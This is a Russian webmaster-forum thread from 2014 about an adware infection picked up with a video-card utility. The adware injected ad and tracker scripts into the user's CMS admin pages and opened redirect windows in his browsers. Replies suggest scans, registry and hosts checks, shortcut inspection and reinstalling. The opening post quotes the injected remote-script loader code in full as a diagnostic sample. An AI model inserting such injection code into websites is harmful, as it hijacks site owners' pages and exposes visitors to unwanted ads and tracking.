Перейти к содержимому

MOAB

* * * * * 1 Голосов

Открывается окно в браузере с рекламой. Еще показывались левые баннеры и на своих сайтах код рекламы добавлялся


  • Войдите, чтобы ответить
Сообщений в теме: 39

#1 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

Отправлено 08 Май 2014 - 20:49

Устанавливал утилиту, чтобы определить точно какая у меня видеокарта. Аваст бесплатный сразу ругнулся на нее, но я не придал значения.
Короче вирус.

Самое, что напрягло, это то, что при создании страницы через админку на своем сайте мне туда подмешивался код:

<div id="panterabanner"><!-- CODES --> <!--script src="//front.facetz.net/collect.js" type="text/javascript">
</script>
<script type="text/javascript">
	loadFacetzCollector(“facetz" ,"");
</script--> <!--script type="text/javascript" src="http://am15.net/cu.php?s=53170"></script>
<script type="text/javascript" src="http://superpromokody.com/clk.js"></script--> <!--script>
( function ( src ) {
var script = document.createElement( 'script' );
script.src = src;
( document.head || document.body || document.documentElement ).appendChild( script );
} )( '//infolooks.org/api/qfe5rqcvizmcjfars0wkmnytahh8sxz4' );
</script--> <!--script>
			var s_advm_logic3 = document.createElement('div');
			s_advm_logic3.id = 'advm_video';
			document.getElementsByTagName('body')[0].insertBefore(s_advm_logic3, document.getElementsByTagName('body')[0].firstChild);
			var s_advm_logic4 = document.createElement('div');
			s_advm_logic4.id = 'advm_block';
			s_advm_logic4.style.display = 'none';
			s_advm_logic4.innerHTML = '
<div id="advm_close">Закрыть [X]</div>
<div id="ambn79249"></div>
<div id="advm_box">
<div>Осталось <span id="advm_timer"></span> сек.</div>
</div>
';
			document.getElementsByTagName('body')[0].insertBefore(s_advm_logic4, document.getElementsByTagName('body')[0].firstChild);
			var s_advm_logic2 = document.createElement('script');
			s_advm_logic2.type = 'text/javascript';
			s_advm_logic2.src = 'http://c.am15.net/preloader7.js';
			document.getElementsByTagName('head')[0].appendChild(s_advm_logic2);
   var s_advm_logic = document.createElement('script');
			s_advm_logic.setAttribute("type", "text/javascript");
			s_advm_logic.textContent = 'var advm_timeToShow=15;var autoclose=true;var preroll_timer=true;var preroll_begin_text="";var preroll_showtimes=1;var u_id=79249;var preroll_site_id=53170;var preroll_banner_size=3;var prerollBg="locker_bg2";var preroll_progress_bar_color="undefined";var preroll_panel_color="FFFFFF";var preroll_title_color="000000";var preroll_end_text="Закрыть [X]";';
			document.getElementsByTagName('head')[0].appendChild(s_advm_logic);  
</script--></div>
<div id="panteracounter"><a style="position: absolute; top: -100000px;" href="http://www.liveinternet.ru/click;superpromokody" target="_blank"><img title="LiveInternet" alt="" src="//counter.yadro.ru/hit;superpromokody?t52.6;r;s1366*768*24;uhttp%3A//*****.ru/wp-admin/post-new.php;0.8232360964812041" width="31" height="31" border="0" /></a></div>

Причем на разных сайтах и разных движках (вордпресс и джумла).
*****.ru тут - это мой сайт, звездочки тут сам поставил, чтобы не палиться.

Проверил весь комп. Аваст бесплатный ничего не нашел, повторно запустил проверку при запуске Винды. Что-то нашел, но вроде не этот вирус.

Далее проверил комп утилитой от Доктор Веб. Нашла 2 угрозы - удалил все. Ситуация не поменялась.
Далее я посмотрел в расширениях браузеров (Мозила и Хром) и нашел там расширение под именем superpromokody. Удалил его, но все равно при запуске открывает доп. окно в брузере, где сначала адрес http://lightcoffee.ru/, далее редирект на http://traflab.ru/rotator, далее уже сайт рекламодателя (онлайн игра или лохотрон).

Но после удаления расширения уже в админках сайта хоть ничего не подмешивается. Также исчезли баннеры в Хроме (вот какие они были, причем на всех сайтах):
Изображение

Еще проверил комп антивирусной утилитой от Вконтакте Cezurity. Нашла 2 угрозы - удалил, перезагрузил комп. Все равно в браузерах Мозила и Хром при запуске эти рекламные окна.

Они то еще ладно, хотя тоже хотел бы избавиться.
Боюсь, чтобы чего еще не осталось от этого вируса, чтобы на мои сайты зараза не пошла. По фтп пока подключаться не буду. Сайты нужно будет бекапить на всякий случай.

Может кто что посоветует? Может кто с подобным сталкивался?

#2 Mark

Mark

    свободен для заказов

  • Старая гвардия
  • PipPipPipPipPip
  • 2 485 сообщений
2 311
  • Издалека - долго

Отправлено 08 Май 2014 - 21:33

ну поставь каспера до кучи
кэш почисти, посмотри автозагрузку в реестре.

#3 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 08 Май 2014 - 22:05

Просмотр сообщенияMark сказал:

ну поставь каспера до кучи
ага. уже ставлю и буду проверять.

Просмотр сообщенияMark сказал:

кэш почисти, посмотри автозагрузку в реестре.
кэш в 2-х браузерах почистил уже, не помогло. Думаю еще может весь реестр почистить.
А где вообще автозагрузку в реестре смотреть?

#4 isay777

isay777

    смурфосеошнег

  • Модератор
  • PipPipPipPipPip
  • 2 283 сообщений
2 427
  • ИзМосква

Отправлено 08 Май 2014 - 22:13

У меня была такая же тема это браузер и hosts в винде.

Там уоки програмулю подкинул она все почистила. Я с мобильника. Сейчас найду как называлась
Только ломанные проги слители из за обновлений
мое портфолио - Дешевый и надежный хостинг c SSD --- СНИМАЕМ ПОЗИЦИИ ЧЕТКО

#5 Mark

Mark

    свободен для заказов

  • Старая гвардия
  • PipPipPipPipPip
  • 2 485 сообщений
2 311
  • Издалека - долго

Отправлено 08 Май 2014 - 22:17

Просмотр сообщенияRealtim (08 Май 2014 - 22:05) писал:

А где вообще автозагрузку в реестре смотреть?
самое простое HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
но там еще мест много куда спрятать можно, можно попробывать поискать в реестре по именам сайтов и названиям скриптов... кстати названия скриптов запусти в поиск по компьютеру.

Просмотр сообщенияisay777 (08 Май 2014 - 22:13) писал:

У меня была такая же тема это браузер и hosts в винде.

Там уоки програмулю подкинул она все почистила. Я с мобильника. Сейчас найду как называлась
Только ломанные проги слители из за обновлений
верное дело говоришь, стоит и хост глянуть windows\system32\drivers\ets\host

#6 isay777

isay777

    смурфосеошнег

  • Модератор
  • PipPipPipPipPip
  • 2 283 сообщений
2 427
  • ИзМосква

Отправлено 08 Май 2014 - 22:23

http://webimho.ru/to...рус#entry140257
мое портфолио - Дешевый и надежный хостинг c SSD --- СНИМАЕМ ПОЗИЦИИ ЧЕТКО

#7 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 08 Май 2014 - 23:55

Короче почистил реестр, кеш и все остальное при помощи CCleaner. Не помогло. Уже потиху едет крыша, почти весь день борюсь.

Просмотр сообщенияisay777 сказал:

У меня была такая же тема это браузер и hosts в винде.
У меня вроде там все норм, вот содержание:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#	  102.54.94.97	 rhino.acme.com		  # source server
#	   38.25.63.10	 x.acme.com			  # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1	   localhost
# ::1			 localhost

Просмотр сообщенияisay777 сказал:

Там уоки програмулю подкинул она все почистила.

Скачал прогу http://www.malwarebytes.org/. Нашла она мне какую-то хрень, по названию похоже, что оно. Но там были такие варианты (перевл через переводчик):
  • Карантин
  • Добавить в исключение
  • пропустить 1 раз
Почему удалить нельзя? Впрочем в браузерах по прожнему открывается окно http://lightcoffee.ru/, но потом блокируется этим антивирусом:
Изображение

это Хром, в Мозите тоже самое.
Кстати, что-то он очень часто оповещения выдает и блокирует много чего. Вот http://all-episodes.com/ заблокировал, вроде там ничего нет такого.

Просмотр сообщенияMark сказал:

самое простое HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
что-то я тут не догоняю как этот путь найти вообще. Если в проводник просто вбить, то ничего не выходит.

Цитата


кстати названия скриптов запусти в поиск по компьютеру.

пробовал, без результатов


В общем думаю сносить этот Malwarebytes Anti-Malware и ставить триал от Каспера

#8 Уоки-Токи

Уоки-Токи

    .

  • S.E.Syndicate
  • PipPipPipPipPip
  • 2 189 сообщений
3 847

Отправлено 09 Май 2014 - 00:10

У кого-то есть время через таймвивер удалить это дерьмо?! если Тс не против, конечно)

#9 Spinne

Spinne

    Зануда™

  • Основатель
  • PipPipPipPipPip
  • 2 011 сообщений
3 446
  • Излесу, вестимо

Отправлено 09 Май 2014 - 00:13

Просмотр сообщенияRealtim (08 Май 2014 - 23:55) писал:

что-то я тут не догоняю как этот путь найти вообще. Если в проводник просто вбить, то ничего не выходит.
Это редактором реестра делается.
C:\Windows\system32\regedt32.exe – вот там и найдутся все пути.
Ник не менял, подпись поменяю позже. Ваш Зануда. Он же AHP-net, но это уже там

#10 kuzka

kuzka

    Продвинутый

  • Участник
  • PipPipPip
  • 233 сообщений
84
  • ИзМСК

Отправлено 09 Май 2014 - 00:21

ярлык на открытие браузера еще проверь, на правильность пути, мб в путь ярлыка доп. загрузка стоит чего-нибудь.

И в антивирусах галочку поставь - запретить рекламное ПО, он по умолчанию обычно рекламное ПО за угрозу не считает

Сообщение отредактировал kuzka: 09 Май 2014 - 00:22


#11 Уоки-Токи

Уоки-Токи

    .

  • S.E.Syndicate
  • PipPipPipPipPip
  • 2 189 сообщений
3 847

Отправлено 09 Май 2014 - 00:27

Гугл, сука :lol: Вдруг, поможет)

Цитата

Отлично! Тогда продолжаем поиски: «Пуск» — системный диск «C» (или «D», если у вас на нем стоит ОС) — папка «Program Files» — папка «Mozilla Firefox». Теперь — предельное внимание: вам необходимо найти самую заразу. Подсказка: вирус — это не обычный файл, в данном случае вирус замаскирован под ярлык Firefox! Причем, вы даже не заметите этого, пока не наведете на ярлык Firefox курсор: вот тут-то и все раскроется. Итак, в папке Mozilla Firefox есть два ярлыка Firefox, один из которых является вирусом! Наведите курсор на каждый из ярлыков и смотрите, как отобразится подпись: вирусный ярлык так и будет подписан — «http://lightcoffee.ru» (хотя визуально будет присутствовать подпись Firefox). Но, повторяю: вы это увидите только тогда, когда наведете курсор на ярлык Firefox, расположенный в папке Mozilla Firefox!
Всё: нашли — удаляем. Теперь запускаем браузер: всё стало на свои места! И при этом вам не пришлось ковыряться в системе: всё гениальное — просто. Удачи!

CCleaner - уг, кстати. Хотя бы Vit registry fix. :)

#12 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 09 Май 2014 - 00:47

Просмотр сообщенияУоки-Токи сказал:

У кого-то есть время через таймвивер удалить это дерьмо?! если Тс не против, конечно)
время надо и уметь еще...
Пока Каспером еще проверю, потом дальше пойдем, если не поможет. Сегодня уже устал, бошка не варит.

#13 Serg_pnz

Serg_pnz

    Hanswurst

  • Старая гвардия
  • PipPipPipPipPip
  • 2 099 сообщений
1 737
  • Из*** гонец? Гонец из Пензы?... Нет – реальный гонец!

Отправлено 09 Май 2014 - 02:28

Да не поможет антивирус... Вообще никакой.
Надо в безопасном режиме! почистить все tmp-папки, в Program Files и Documents and Settings найти новые папки и, ориентируясь на их названия, почистить реестр, в браузерах посмотреть новые надстройки, плагины и панели и откорректировать их (удалить атозапуски), почистить страницы по умолчанию, проверить ярлыки.
Если этого не сделать комплексно, то она (как неубиваемая кука) опять себя восстановит.
Localhost смотреть из безопасного режима.

upd: Вообще решений подобных полно. Вот таких http://virusinfo.inf...ad.php?t=157198
Не все кальсоны с оторванными пуговицами – брюки. © Serg_pnz

#14 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 09 Май 2014 - 12:25

Просмотр сообщенияSpinne сказал:

Это редактором реестра делается. C:\Windows\system32\regedt32.exe – вот там и найдутся все пути.

Тут HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run находится только AdobeUpdater
По адресу HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run тоже вроде все нормально:

Изображение

Просмотр сообщенияkuzka сказал:

ярлык на открытие браузера еще проверь, на правильность пути, мб в путь ярлыка доп. загрузка стоит чего-нибудь.
без понятия где это смотреть. У меня браузеры закреплены на панели задач. При нажатии правой кнопкой по ним там нет никаких свойст и тому подобного.


Кстати, проверил Каспером Crystal. Что-то он там кучу всего упаковал, но вроде ничего вредоносного не нашел. Или все что упаковано - это потенциально вредоносное? Но в любом случае проблема не решена.

Капец!!! Каспер блокирует функции в админке вордпресс - ни исходный код не посмотреть, ни картинку загрузить, ни метки выбрать. Вышел из Каспера, но все равно в админке этого сайта ничего не работает. А админке другого сайта на ВП все пашет как надо. Как вообще можно работать с Каспером??? Он блочит все подряд, что надо и что не надо!

Serg_pnz, спасибо за совет. Буду твои способы пробовать.

Кстати, в IE ничего дополнительно не вылазит.

#15 Mark

Mark

    свободен для заказов

  • Старая гвардия
  • PipPipPipPipPip
  • 2 485 сообщений
2 311
  • Издалека - долго

Отправлено 09 Май 2014 - 12:33

каспера надо было KIS брать который.

#16 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 09 Май 2014 - 12:44

Просмотр сообщенияMark сказал:

каспера надо было KIS брать который.
CRYSTAL дороже, вот я его решил скачать триал. Можно, в принципе удалить и еще KIS попробовать.

#17 Mark

Mark

    свободен для заказов

  • Старая гвардия
  • PipPipPipPipPip
  • 2 485 сообщений
2 311
  • Издалека - долго

Отправлено 09 Май 2014 - 13:12

Просмотр сообщенияRealtim (09 Май 2014 - 12:44) писал:


CRYSTAL дороже, вот я его решил скачать триал. Можно, в принципе удалить и еще KIS попробовать.
каспер блочит только то что ему скажешь, так что в настройках копай.
в KIS есть искать уязвимости, попробуй ;)

#18 kuzka

kuzka

    Продвинутый

  • Участник
  • PipPipPip
  • 233 сообщений
84
  • ИзМСК

Отправлено 09 Май 2014 - 14:14

а ОС какая стоит у ТС?

win7

я вот чего думаю то) ты откатить до точки какой-нибудь не можешь? скажем месяц назад, мне иногда помогало.

#19 Realtim

Realtim

    Мастер

  • Основатель
  • PipPipPipPip
  • 747 сообщений
336
  • Twitter

TC Отправлено 09 Май 2014 - 14:36

Просмотр сообщенияkuzka сказал:

я вот чего думаю то) ты откатить до точки какой-нибудь не можешь? скажем месяц назад, мне иногда помогало.
да. вин 7. Откатывать назад не умею... При этом все данные винды откатятся, или вообще все данные на компе?

#20 kuzka

kuzka

    Продвинутый

  • Участник
  • PipPipPip
  • 233 сообщений
84
  • ИзМСК

Отправлено 09 Май 2014 - 14:51

Просмотр сообщенияRealtim (09 Май 2014 - 14:36) писал:

да. вин 7. Откатывать назад не умею... При этом все данные винды откатятся, или вообще все данные на компе?

откатятся только установленные программы, данные не будут затронуты

http://otvet.mail.ru/question/26347257

либо при загрузке винды F8 жми часто, меню должно выскочить.



Но бывает одна тонкость (сталкивался), бывает вирус данные для восстановления "портит" и после отката винда может умереть. Так что диск для восстановления винды тоже подготовь на всяк.

Но я бы не мучался, все бы снес, и заново переустановил, займет макс день. а при наличии образа системного диска почти моментально.

но на всякий случай документы перенеси.



Похожие темы


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных



© 2020 SMO&SEO форум «WEBIMHO» — продвижение и создание сайтов, интернет-маркетинг

По вопросам рекламы на форуме и цены на рекламу
Все материалы SEO форума разрешены к копированию только с установкой гиперактивной ссылки на webimho.ru,
тем, кто этого не сделает, мы оторвем руки и ноги и поменяем местами,
а когда выйдем из тюрьмы, опять оторвем и опять поменяем.


Россия, г. Москва

Мы в соцсетях: twitter | вконтакте | facebook | livejournal